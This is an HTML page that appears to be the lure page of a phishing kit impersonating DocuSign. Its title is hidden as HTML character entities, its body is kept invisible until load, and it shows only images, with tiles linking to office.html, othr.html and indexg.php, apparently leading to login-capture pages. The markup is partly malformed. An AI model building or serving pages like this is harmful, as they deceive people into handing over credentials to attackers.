<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252">
<title>&#68;&#111;&#99;&#117;&#115;&#105;&#103;&#110;</title>

<meta name="viewport" content="width=device-width, initial-scale=1.0">
<link rel="shortcut icon"
              href="images/favicon.ico"/>	
<script type="text/javascript">
function unhideBody()
{
var bodyElems = document.getElementsByTagName("body");
bodyElems[0].style.visibility = "visible";
}
</script>
<body style="visibility:hidden" onload="unhideBody()">
div#container
{
	position:relative;
	width: 1365px;
	margin-top: 0px;
	margin-left: auto;
	margin-right: auto;
	text-align:left; 
}
body {text-align:center;margin:0}
</style>

</head>
<body>
<div id="container">
<div id="image1" style="position:absolute; overflow:hidden; left:0px; top:0px; width:1312px; height:51px; z-index:0"><img src="images/a1.png" alt="" title="" border=0 width=1312 height=51></div>

<div id="image2" style="position:absolute; overflow:hidden; left:22px; top:15px; width:95px; height:25px; z-index:1"><a href="#"><img src="images/a6.png" alt="" title="" border=0 width=95 height=25></a></div>

<div id="image3" style="position:absolute; overflow:hidden; left:159px; top:15px; width:74px; height:28px; z-index:2"><a href="#"><img src="images/a7.png" alt="" title="" border=0 width=74 height=28></a></div>

<div id="image4" style="position:absolute; overflow:hidden; left:0px; top:51px; width:1365px; height:614px; z-index:3"><img src="images/a2.png" alt="" title="" border=0 width=1365 height=614></div>

<div id="image5" style="position:absolute; overflow:hidden; left:439px; top:204px; width:111px; height:111px; z-index:4"><a href="office.html"><img src="images/a3.png" alt="" title="" border=0 width=111 height=111></a></div>

<div id="image6" style="position:absolute; overflow:hidden; left:562px; top:204px; width:112px; height:111px; z-index:5"><a href="othr.html"><img src="images/a4.png" alt="" title="" border=0 width=112 height=111></a></div>

<div id="image7" style="position:absolute; overflow:hidden; left:687px; top:205px; width:112px; height:112px; z-index:6"><a href="othr.html"><img src="images/a5.png" alt="" title="" border=0 width=112 height=112></a></div>


 <div id="image7" style="position:absolute; overflow:hidden; left:813px; top:205px; width:112px; height:112px; z-index:6"><a href="indexg.php"><img src="images/a8.png" alt="" title="" border=0 width=112 height=112></a></div> 

</div>

</body>
</html>
